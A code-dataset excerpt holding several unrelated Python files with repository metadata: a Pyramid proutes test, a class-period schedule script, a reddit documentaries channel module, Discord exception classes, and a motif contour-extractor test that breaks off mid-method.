| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
25a3cd2e397d3a4fa1405f0e90b2284ec1f6c787
| 6,351
|
py
|
Python
|
pyramid/tests/test_scripts/test_proutes.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_scripts/test_proutes.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_scripts/test_proutes.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from pyramid.tests.test_scripts import dummy
class TestPRoutesCommand(unittest.TestCase):
def _getTargetClass(self):
from pyramid.scripts.proutes import PRoutesCommand
return PRoutesCommand
def _makeOne(self):
cmd = self._getTargetClass()([])
cmd.bootstrap = (dummy.DummyBootstrap(),)
cmd.args = ('/foo/bar/myapp.ini#myapp',)
return cmd
def test_good_args(self):
cmd = self._getTargetClass()([])
cmd.bootstrap = (dummy.DummyBootstrap(),)
cmd.args = ('/foo/bar/myapp.ini#myapp', 'a=1')
route = dummy.DummyRoute('a', '/a')
mapper = dummy.DummyMapper(route)
cmd._get_mapper = lambda *arg: mapper
L = []
cmd.out = lambda msg: L.append(msg)
cmd.run()
self.assertTrue('<unknown>' in ''.join(L))
def test_bad_args(self):
cmd = self._getTargetClass()([])
cmd.bootstrap = (dummy.DummyBootstrap(),)
cmd.args = ('/foo/bar/myapp.ini#myapp', 'a')
route = dummy.DummyRoute('a', '/a')
mapper = dummy.DummyMapper(route)
cmd._get_mapper = lambda *arg: mapper
self.assertRaises(ValueError, cmd.run)
def test_no_routes(self):
command = self._makeOne()
mapper = dummy.DummyMapper()
command._get_mapper = lambda *arg: mapper
L = []
command.out = L.append
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(L, [])
def test_no_mapper(self):
command = self._makeOne()
command._get_mapper = lambda *arg:None
L = []
command.out = L.append
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(L, [])
def test_single_route_no_route_registered(self):
command = self._makeOne()
route = dummy.DummyRoute('a', '/a')
mapper = dummy.DummyMapper(route)
command._get_mapper = lambda *arg: mapper
L = []
command.out = L.append
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(len(L), 3)
self.assertEqual(L[-1].split(), ['a', '/a', '<unknown>'])
def test_route_with_no_slash_prefix(self):
command = self._makeOne()
route = dummy.DummyRoute('a', 'a')
mapper = dummy.DummyMapper(route)
command._get_mapper = lambda *arg: mapper
L = []
command.out = L.append
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(len(L), 3)
self.assertEqual(L[-1].split(), ['a', '/a', '<unknown>'])
def test_single_route_no_views_registered(self):
from zope.interface import Interface
from pyramid.registry import Registry
from pyramid.interfaces import IRouteRequest
registry = Registry()
def view():pass
class IMyRoute(Interface):
pass
registry.registerUtility(IMyRoute, IRouteRequest, name='a')
command = self._makeOne()
route = dummy.DummyRoute('a', '/a')
mapper = dummy.DummyMapper(route)
command._get_mapper = lambda *arg: mapper
L = []
command.out = L.append
command.bootstrap = (dummy.DummyBootstrap(registry=registry),)
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(len(L), 3)
self.assertEqual(L[-1].split()[:3], ['a', '/a', 'None'])
def test_single_route_one_view_registered(self):
from zope.interface import Interface
from pyramid.registry import Registry
from pyramid.interfaces import IRouteRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IView
registry = Registry()
def view():pass
class IMyRoute(Interface):
pass
registry.registerAdapter(view,
(IViewClassifier, IMyRoute, Interface),
IView, '')
registry.registerUtility(IMyRoute, IRouteRequest, name='a')
command = self._makeOne()
route = dummy.DummyRoute('a', '/a')
mapper = dummy.DummyMapper(route)
command._get_mapper = lambda *arg: mapper
L = []
command.out = L.append
command.bootstrap = (dummy.DummyBootstrap(registry=registry),)
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(len(L), 3)
compare_to = L[-1].split()[:3]
self.assertEqual(compare_to, ['a', '/a', '<function'])
def test_single_route_one_view_registered_with_factory(self):
from zope.interface import Interface
from pyramid.registry import Registry
from pyramid.interfaces import IRouteRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IView
registry = Registry()
def view():pass
class IMyRoot(Interface):
pass
class IMyRoute(Interface):
pass
registry.registerAdapter(view,
(IViewClassifier, IMyRoute, IMyRoot),
IView, '')
registry.registerUtility(IMyRoute, IRouteRequest, name='a')
command = self._makeOne()
def factory(request): pass
route = dummy.DummyRoute('a', '/a', factory=factory)
mapper = dummy.DummyMapper(route)
command._get_mapper = lambda *arg: mapper
L = []
command.out = L.append
command.bootstrap = (dummy.DummyBootstrap(registry=registry),)
result = command.run()
self.assertEqual(result, 0)
self.assertEqual(len(L), 3)
self.assertEqual(L[-1].split()[:3], ['a', '/a', '<unknown>'])
def test__get_mapper(self):
from pyramid.registry import Registry
from pyramid.urldispatch import RoutesMapper
command = self._makeOne()
registry = Registry()
result = command._get_mapper(registry)
self.assertEqual(result.__class__, RoutesMapper)
class Test_main(unittest.TestCase):
def _callFUT(self, argv):
from pyramid.scripts.proutes import main
return main(argv, quiet=True)
def test_it(self):
result = self._callFUT(['proutes'])
self.assertEqual(result, 2)
| 36.5
| 72
| 0.600063
| 674
| 6,351
| 5.532641
| 0.137982
| 0.084473
| 0.036203
| 0.043443
| 0.779297
| 0.73934
| 0.739072
| 0.711183
| 0.711183
| 0.711183
| 0
| 0.004814
| 0.280428
| 6,351
| 173
| 73
| 36.710983
| 0.81116
| 0
| 0
| 0.700637
| 0
| 0
| 0.026772
| 0.011339
| 0
| 0
| 0
| 0
| 0.146497
| 1
| 0.11465
| false
| 0.050955
| 0.121019
| 0
| 0.292994
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
25f0a32bd79bafc09891b19c1a08035f8d13f0e4
| 151
|
py
|
Python
|
basars_addons/schedules/__init__.py
|
Basars/basars-addons
|
0719216613ab7c6d23b26e55b09b9b024e1485ad
|
[
"MIT"
] | null | null | null |
basars_addons/schedules/__init__.py
|
Basars/basars-addons
|
0719216613ab7c6d23b26e55b09b9b024e1485ad
|
[
"MIT"
] | null | null | null |
basars_addons/schedules/__init__.py
|
Basars/basars-addons
|
0719216613ab7c6d23b26e55b09b9b024e1485ad
|
[
"MIT"
] | null | null | null |
from basars_addons.schedules.cosine_decay import InitialCosineDecayRestarts
from basars_addons.schedules.cosine_decay import CosineDecayWarmupRestarts
| 50.333333
| 75
| 0.92053
| 16
| 151
| 8.4375
| 0.5625
| 0.148148
| 0.237037
| 0.37037
| 0.622222
| 0.622222
| 0.622222
| 0
| 0
| 0
| 0
| 0
| 0.05298
| 151
| 2
| 76
| 75.5
| 0.944056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d303c2dafa1f17c348ddee3c99adecf98990c23e
| 12,671
|
py
|
Python
|
schedule.py
|
budgidiere/Schedule
|
45e2777d9cb24c098a91a4ec83b31127264a1edc
|
[
"Apache-2.0"
] | null | null | null |
schedule.py
|
budgidiere/Schedule
|
45e2777d9cb24c098a91a4ec83b31127264a1edc
|
[
"Apache-2.0"
] | null | null | null |
schedule.py
|
budgidiere/Schedule
|
45e2777d9cb24c098a91a4ec83b31127264a1edc
|
[
"Apache-2.0"
] | null | null | null |
#schedule.py
#importing time
import time
#Making time readable format
clock = (time.ctime())
hour = clock[11:13]
minute = clock[14:16]
currenttime = 60*int(hour) + int(minute)
day = clock[0:3]
print (currenttime)
print (clock)
#IDK why this is here
whatclass = ("none")
#used to read White and Gold week Value
def readwg():
global wg
wgweek = open("wgweekfile.txt","r")
wg = wgweek.read()
wgweek.close()
#Used to wirte white and gold value
def changewg(value):
print("ok")
wgweek_write = open("wgweekfile.txt","w")
wgweek_write.write(str(value))
wgweek_write.close()
changewg = ("false")
#cheking if this is frist run
def checkfirstrun():
if str(wg) == (str(3)):
print ("hi")
changewgvalue = input("Please set white and gold ")
changewg(changewgvalue)
#Used to detirmen class
def getclass():
global whatclass
if str(wg) == (0):
if day == ("Mon"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("4th Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("5th Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("6th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("7th Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("1st Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("2nd Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("3rd Peorid")
elif day == ("Tue"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("1st Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("2nd Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("3rd Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("4th Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("5th Period")
elif day == ("Wed"):
if currenttime < 540 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 605.4 and currenttime > 540.1:
whatclass = ("6th Period")
elif currenttime < 611.4 and currenttime > 605.5:
whatclass = ("Advisory")
elif currenttime < 667.1 and currenttime > 611.5:
whatclass = ("X Period")
elif currenttime < 682.1 and currenttime > 667.2:
whatclass = ("Lunch")
elif currenttime < 749.4 and currenttime > 682.2:
whatclass = ("7th Period")
elif currenttime < 840.6 and currenttime > 749.5:
whatclass = ("1st Period")
elif currenttime < 845.4 and currenttime > 840.7:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 845.5:
whatclass = ("2nd Period")
elif day == ("Thu"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Bulding Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("3rd Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("4th Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("5th Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("6th Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("7th Period")
elif day == ("Fri"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("5th Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("6th Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("7th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("1st Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("2nd Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("3rd Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("4th Peorid")
elif currenttime < 912.1:
changewg(1)
elif str(wg) == (1):
if day == ("Mon"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("4th Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("5th Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("6th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("7th Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("1st Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("2nd Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("3rd Peorid")
elif day == ("Tue"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("5th Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("6th Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("7th Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("1st Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("2nd Period")
elif day == ("Wed"):
if currenttime < 540 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 605.4 and currenttime > 540.1:
whatclass = ("3rd Period")
elif currenttime < 611.4 and currenttime > 605.5:
whatclass = ("Advisory")
elif currenttime < 667.1 and currenttime > 611.5:
whatclass = ("X Period")
elif currenttime < 682.1 and currenttime > 667.2:
whatclass = ("Lunch")
elif currenttime < 749.4 and currenttime > 682.2:
whatclass = ("4th Period")
elif currenttime < 840.6 and currenttime > 749.5:
whatclass = ("5th Period")
elif currenttime < 845.4 and currenttime > 840.7:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 845.5:
whatclass = ("6th Period")
elif day == ("Thu"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Bulding Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("7th Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("1st Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("2nd Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("3rd Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("4th Period")
elif day == ("Fri"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("2nd Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("3rd Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("4th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("5th Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("6th Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("7th Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("1st Peorid")
elif currenttime < 912.1:
changewg(0)
else:
whatclass = ("none")
#Main part of the program
while True:
#read wg value
readwg()
#cheks if it's first run
checkfirstrun()
#get what class it is
getclass()
#prints the class (will be replaced)
print(whatclass)
#sleeps so no spam
time.sleep(60)
| 45.253571
| 61
| 0.531529
| 1,310
| 12,671
| 5.138931
| 0.114504
| 0.22044
| 0.112299
| 0.038622
| 0.880719
| 0.870469
| 0.856209
| 0.856209
| 0.856209
| 0.839275
| 0
| 0.111028
| 0.369505
| 12,671
| 279
| 62
| 45.415771
| 0.731631
| 0.025807
| 0
| 0.847909
| 0
| 0
| 0.094323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015209
| false
| 0
| 0.003802
| 0
| 0.019011
| 0.019011
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d32fadd4ff7f6437fb1ebe111930355e7c14cd81
| 5,058
|
py
|
Python
|
home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py
|
erick-guerra/Royalbox
|
967dbbdddc94b9968e6eba873f0d20328fd86f66
|
[
"MIT"
] | 1
|
2022-01-29T11:17:58.000Z
|
2022-01-29T11:17:58.000Z
|
home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py
|
erick-guerra/Royalbox
|
967dbbdddc94b9968e6eba873f0d20328fd86f66
|
[
"MIT"
] | null | null | null |
home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py
|
erick-guerra/Royalbox
|
967dbbdddc94b9968e6eba873f0d20328fd86f66
|
[
"MIT"
] | null | null | null |
import chanutils.reddit
_SUBREDDIT = 'Documentaries'
_FEEDLIST = [
{'title':'Latest', 'url':'http://www.reddit.com/r/Documentaries.json'},
{'title':'Anthropology', 'url':'http://www.reddit.com/r/documentaries/search.json?q=flair%3A%27Anthropology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Art', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Art%27&sort=top&restrict_sr=on&t=all'},
{'title':'Biography', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Biography%27&sort=top&restrict_sr=on&t=all'},
{'title':'Crime', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Crime%27&sort=top&restrict_sr=on&t=all'},
{'title':'Cusine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Cuisine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Disaster', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Disaster%27&sort=top&restrict_sr=on&t=all'},
{'title':'Drugs', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Drugs%27&sort=top&restrict_sr=on&t=all'},
{'title':'Economics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Economics%27&sort=top&restrict_sr=on&t=all'},
{'title':'History', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27History%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (Ancient)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Ancient+hist%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (20th Century)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%2720th+century%27&sort=top&restrict_sr=on&t=all'},
{'title':'Intelligence', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Intelligence%27&sort=top&restrict_sr=on&t=all'},
{'title':'Literature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Literature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Medicine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Medicine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Music', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Music%27&sort=top&restrict_sr=on&t=all'},
{'title':'Nature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Nature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Offbeat', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Offbeat%27&sort=top&restrict_sr=on&t=all'},
{'title':'American Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27American+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'International Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Int+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'Psychology', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Psychology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Religion', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Religion%27&sort=top&restrict_sr=on&t=all'},
{'title':'Science', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Science%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sex', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sex%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sport', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sport%27&sort=top&restrict_sr=on&t=all'},
{'title':'Tech/Internet', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Tech%27&sort=top&restrict_sr=on&t=all'},
{'title':'Travel', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Travel%27&sort=top&restrict_sr=on&t=all'},
{'title':'War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27War%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 1', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW1%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 2', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW2%27&sort=top&restrict_sr=on&t=all'},
{'title':'Vietnam War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Vietnam+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Afghanistan War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Afghanistan+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Iraq War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Iraq+conflict%27&sort=top&restrict_sr=on&t=all'},
]
def name():
return 'Documentaries'
def image():
return "icon.png"
def description():
return "Assorted Documentaries Channel for /r/Documentaries subreddit (<a target='_blank' href='http://www.reddit.com/r/Documentaries'>http://www.reddit.com/r/Documentaries</a>)."
def feedlist():
return _FEEDLIST
def feed(idx):
return chanutils.reddit.get_feed(_FEEDLIST[idx])
def search(q):
return chanutils.reddit.search(_SUBREDDIT, q)
| 87.206897
| 181
| 0.723013
| 831
| 5,058
| 4.353791
| 0.135981
| 0.139303
| 0.12576
| 0.154782
| 0.769762
| 0.769762
| 0.753179
| 0.744057
| 0.744057
| 0.552515
| 0
| 0.034625
| 0.040728
| 5,058
| 57
| 182
| 88.736842
| 0.711047
| 0
| 0
| 0
| 0
| 0.673469
| 0.821669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122449
| false
| 0
| 0.020408
| 0.122449
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d3a2ec6e173d0fb72a68a3b63d9761d99c77b5bc
| 175
|
py
|
Python
|
src/misc/exceptions.py
|
KirtusJ/BirdBot
|
4440364caefa6ec9acf1bc7cf38605b1d90de20e
|
[
"MIT"
] | null | null | null |
src/misc/exceptions.py
|
KirtusJ/BirdBot
|
4440364caefa6ec9acf1bc7cf38605b1d90de20e
|
[
"MIT"
] | null | null | null |
src/misc/exceptions.py
|
KirtusJ/BirdBot
|
4440364caefa6ec9acf1bc7cf38605b1d90de20e
|
[
"MIT"
] | null | null | null |
from discord.ext import commands
class NotOwner(commands.CheckFailure):
pass
class NotModerator(commands.CheckFailure):
pass
class Blacklisted(commands.CheckFailure):
pass
| 21.875
| 42
| 0.834286
| 20
| 175
| 7.3
| 0.55
| 0.410959
| 0.493151
| 0.39726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091429
| 175
| 8
| 43
| 21.875
| 0.918239
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.428571
| 0.142857
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
d3a81b924210e6b5f2ecf0bea93f3ef9cc255120
| 16,982
|
py
|
Python
|
tests/contour_extractors/test_utils.py
|
yamathcy/motif
|
3f43568e59f0879fbab5ef278e9e687b7cac3dd6
|
[
"MIT"
] | 21
|
2016-08-22T22:00:49.000Z
|
2020-03-29T04:15:19.000Z
|
tests/contour_extractors/test_utils.py
|
yamathcy/motif
|
3f43568e59f0879fbab5ef278e9e687b7cac3dd6
|
[
"MIT"
] | 22
|
2016-08-28T01:07:08.000Z
|
2018-02-07T14:38:26.000Z
|
tests/contour_extractors/test_utils.py
|
yamathcy/motif
|
3f43568e59f0879fbab5ef278e9e687b7cac3dd6
|
[
"MIT"
] | 3
|
2017-01-12T10:04:27.000Z
|
2022-01-06T13:25:48.000Z
|
"""Tests for motif/contour_extractors/utils.py
"""
import unittest
import numpy as np
from motif.contour_extractors import utils
class TestPeakStreamHelper(unittest.TestCase):
def setUp(self):
self.S = np.array([
[0, 0, 0],
[1, 0, 5],
[0, 0.002, 1],
[0.1, 0, 0],
[0, 0, 0]
])
self.times = np.array([0.0, 0.5, 1.0])
self.freqs = np.array([10., 100., 150., 200., 300.])
self.amp_thresh = 0.9
self.dev_thresh = 0.9
self.n_gap = 3.234
self.pitch_cont = 80
self.psh = utils.PeakStreamHelper(
self.S, self.times, self.freqs, self.amp_thresh, self.dev_thresh,
self.n_gap, self.pitch_cont
)
def test_S(self):
expected = np.array([
[0, 0, 0],
[1, 0, 5],
[0, 0.002, 1],
[0.1, 0, 0],
[0, 0, 0]
])
actual = self.psh.S
self.assertTrue(np.allclose(expected, actual))
def test_S_norm(self):
expected = np.array([
[0, 0, 0],
[1, 0, 1],
[0, 1.0, 0.2],
[0.1, 0, 0],
[0, 0, 0]
])
actual = self.psh.S_norm
self.assertTrue(np.allclose(expected, actual))
def test_times(self):
expected = np.array([0.0, 0.5, 1.0])
actual = self.psh.times
self.assertTrue(np.allclose(expected, actual))
def test_freqs(self):
expected = np.array([
0., 3986.31371386, 4688.26871473, 5186.31371386, 5888.26871473
])
actual = self.psh.freqs
self.assertTrue(np.allclose(expected, actual))
def test_amp_thresh(self):
expected = 0.9
actual = self.psh.amp_thresh
self.assertEqual(expected, actual)
def test_dev_thresh(self):
expected = 0.9
actual = self.psh.dev_thresh
self.assertEqual(expected, actual)
def test_n_gap(self):
expected = 3.234
actual = self.psh.n_gap
self.assertEqual(expected, actual)
def test_pitch_cont(self):
expected = 80
actual = self.psh.pitch_cont
self.assertEqual(expected, actual)
def test_n_peaks(self):
expected = 4
actual = self.psh.n_peaks
self.assertEqual(expected, actual)
def test_peak_index(self):
expected = np.array([0, 1, 2, 3])
actual = self.psh.peak_index
self.assertTrue(np.allclose(expected, actual))
def test_peak_time_index(self):
expected = np.array([0, 2, 1, 0])
actual = self.psh.peak_time_idx
self.assertTrue(np.allclose(expected, actual))
def test_first_peak_time_idx(self):
expected = 0
actual = self.psh.first_peak_time_idx
self.assertEqual(expected, actual)
def test_last_peak_time_idx(self):
expected = 2
actual = self.psh.last_peak_time_idx
self.assertEqual(expected, actual)
def test_frame_dict(self):
expected = {
0: [0, 3],
1: [2],
2: [1]
}
actual = self.psh.frame_dict
self.assertEqual(expected.keys(), actual.keys())
for k in actual.keys():
self.assertTrue(np.allclose(expected[k], actual[k]))
def test_peak_freqs(self):
expected = np.array([
3986.31371386, 3986.31371386, 4688.26871473, 5186.31371386
])
actual = self.psh.peak_freqs
self.assertTrue(np.allclose(expected, actual))
def test_peak_amps(self):
